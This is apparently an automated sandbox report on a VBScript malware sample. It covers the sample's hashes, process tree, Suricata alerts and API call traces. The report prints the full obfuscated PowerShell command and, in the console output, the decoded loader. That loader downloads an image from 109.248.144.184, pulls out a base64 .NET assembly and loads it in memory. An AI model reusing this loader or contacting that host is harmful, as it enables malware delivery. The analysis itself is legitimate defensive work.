popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

greatdaysreturnbackdontworryforlovestoyou.gif.vbs

Generic Malware Antivirus
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us April 16, 2025, 11:06 a.m. April 16, 2025, 11:08 a.m.
Size 242.8KB
Type UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5 61e32df87e12055000045a25a185df34
SHA256 ccbf292776fe7ea6fa9e21e97145db512b56c5eee0704bf1e553e800b742cf60
CRC32 5D173C23
ssdeep 192:U2B52bA2fAB82bA2wAB82yiN22CB52W22DA2S2W22f2BP2bA2nSBI2yr2ZSBH2b9:c4UiA9mOzqzeIM8lcosb7
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\greatdaysreturnbackdontworryforlovestoyou.gif.vbs

    1372

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bz#HQ#dQBu#HQ#aQBu#GU#cwBz#C##PQ#g#Cc#d#B4#HQ#LgBy#G8#ZgBl#HI#ZQBo#G4#bwBz#Gc#bgBp#Gg#d#B0#HM#ZQBi#HQ#ZQBn#HI#bwBm#GU#cgBo#HQ#ZQBn#G8#d#Bl#HY#bwBs#GU#cgBh#Gg#cwBl#Hc#LwBv#GM#YgBr#C8#c#Bw#G0#YQB4#C8#N##4#DE#Lg#0#DQ#MQ#u#Dg#N##y#C4#OQ#w#DE#Lw#v#Do#c#B0#HQ#a##n#Ds#J#By#GU#YwBv#Gw#b#Bp#GQ#aQBu#Gc#I##9#C##J#Bz#HQ#dQBu#HQ#aQBu#GU#cwBz#C##LQBy#GU#c#Bs#GE#YwBl#C##Jw#j#Cc#L##g#Cc#d##n#Ds#J#Bi#GU#YgBs#GE#cwB0#C##PQ#g#Cc#a#B0#HQ#c##6#C8#Lw#x#D##OQ#u#DI#N##4#C4#MQ#0#DQ#Lg#x#Dg#N##v#Hg#YQBt#H##c##v#HY#Yg#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#Z#Bl#HM#YwB1#HI#YQBp#G4#aQBh#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#cgBh#GI#ZQBz#HE#dQBl#GQ#I##9#C##J#Bk#GU#cwBj#HU#cgBh#Gk#bgBp#GE#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#YgBl#GI#b#Bh#HM#d##p#Ds#J#B0#Hc#ZQBy#Gs#aQBu#Gc#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bh#HI#YQBi#GU#cwBx#HU#ZQBk#Ck#Ow#k#H##ZQBz#GM#YQBk#Gk#d#Bv#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bm#HU#cwBp#G8#bgBs#GU#cwBz#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#k#GY#bwBy#GU#ZgBl#G4#Z#Bp#G4#Zw#g#D0#I##k#HQ#dwBl#HI#awBp#G4#Zw#u#Ek#bgBk#GU#e#BP#GY#K##k#H##ZQBz#GM#YQBk#Gk#d#Bv#Ck#Ow#k#GM#cgBv#Hk#b#Bz#HQ#bwBu#GU#I##9#C##J#B0#Hc#ZQBy#Gs#aQBu#Gc#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bm#HU#cwBp#G8#bgBs#GU#cwBz#Ck#Ow#k#GY#bwBy#GU#ZgBl#G4#Z#Bp#G4#Zw#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GM#cgBv#Hk#b#Bz#HQ#bwBu#GU#I##t#Gc#d##g#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Ds#J#Bm#G8#cgBl#GY#ZQBu#GQ#aQBu#Gc#I##r#D0#I##k#H##ZQBz#GM#YQBk#Gk#d#Bv#C4#T#Bl#G4#ZwB0#Gg#Ow#k#H##bwBv#Gw#a#Bv#HU#cwBl#HM#I##9#C##J#Bj#HI#bwB5#Gw#cwB0#G8#bgBl#C##LQ#g#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Ds#J#Bz#G8#bQBl#HM#d#Bo#GU#cwBp#HM#I##9#C##J#B0#Hc#ZQBy#Gs#aQBu#Gc#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#ZgBv#HI#ZQBm#GU#bgBk#Gk#bgBn#Cw#I##k#H##bwBv#Gw#a#Bv#HU#cwBl#HM#KQ#7#CQ#cwBw#G8#cgBp#GM#aQBk#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bz#G8#bQBl#HM#d#Bo#GU#cwBp#HM#KQ#7#CQ#YwBv#G4#bgBp#HY#YQBu#GM#ZQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#HM#c#Bv#HI#aQBj#Gk#Z#Bl#HM#KQ#7#CQ#cgBp#G4#ZwBi#GU#YQBy#GU#cg#g#D0#I#Bb#GQ#bgBs#Gk#Yg#u#Ek#Tw#u#Eg#bwBt#GU#XQ#u#Ec#ZQB0#E0#ZQB0#Gg#bwBk#Cg#JwBW#EE#SQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#E##K##k#HI#ZQBj#G8#b#Bs#Gk#Z#Bp#G4#Zw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Mg#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"

      2084

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
109.248.144.184 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 109.248.144.184:80 -> 192.168.56.103:49164 2047750 ET MALWARE Base64 Encoded MZ In Image A Network Trojan was detected
TCP 109.248.144.184:80 -> 192.168.56.103:49164 2049038 ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 A Network Trojan was detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: True
console_handle: 0x00000013
1 1 0

WriteConsoleW

 buffer: Exception calling "Invoke" with "2" argument(s): "Could not load file or assemb
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: ly 'System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: or one of its dependencies. The system cannot find the file specified."
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:1 char:887
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + $stuntiness = 'txt.roferehnosgnihttsebtegroferhtegotevolerahsew/ocbk/ppmax/48
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: 1.441.842.901//:ptth';$recolliding = $stuntiness -replace '#', 't';$beblast = '
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: http://109.248.144.184/xampp/vb/new_image.jpg';$descurainia = New-Object System
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: .Net.WebClient;$arabesqued = $descurainia.DownloadData($beblast);$twerking = [S
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: ystem.Text.Encoding]::UTF8.GetString($arabesqued);$pescadito = '<<BASE64_START>
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: >';$fusionless = '<<BASE64_END>>';$forefending = $twerking.IndexOf($pescadito);
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: $croylstone = $twerking.IndexOf($fusionless);$forefending -ge 0 -and $croylston
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: e -gt $forefending;$forefending += $pescadito.Length;$poolhouses = $croylstone
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: - $forefending;$somesthesis = $twerking.Substring($forefending, $poolhouses);$s
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: poricides = [System.Convert]::FromBase64String($somesthesis);$connivances = [Sy
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: stem.Reflection.Assembly]::Load($sporicides);$ringbearer = [dnlib.IO.Home].GetM
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: ethod('VAI').Invoke <<<< ($null, [object[]] @($recolliding,'','','','CasPol',''
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodTargetInvocation
console_handle: 0x000000fb
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x007363a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736aa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736aa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736aa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736168
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736168
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736168
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736168
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736168
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736168
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736aa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736aa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736aa8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x007367a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x007367a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x007367a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736be8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x007367a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x007367a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x007367a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x007367a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x007367a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x007367a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x007367a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736ca8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736ca8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736ca8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736ca8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736ca8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736ca8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736ca8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736ca8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736ca8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736ca8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736ca8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736ca8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736ca8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736ca8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736d28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736d28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736368
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736368
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736368
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736368
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736368
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00736368
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.248.144.184/xampp/vb/new_image.jpg
request GET http://109.248.144.184/xampp/vb/new_image.jpg
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02760000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2084
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2084
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02492000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02517000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02515000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02970000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e13000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e15000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e16000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e17000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e18000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e19000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e1a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e1b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2084
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e1c000
allocation_type: 4096 (MEM_COMMIT)
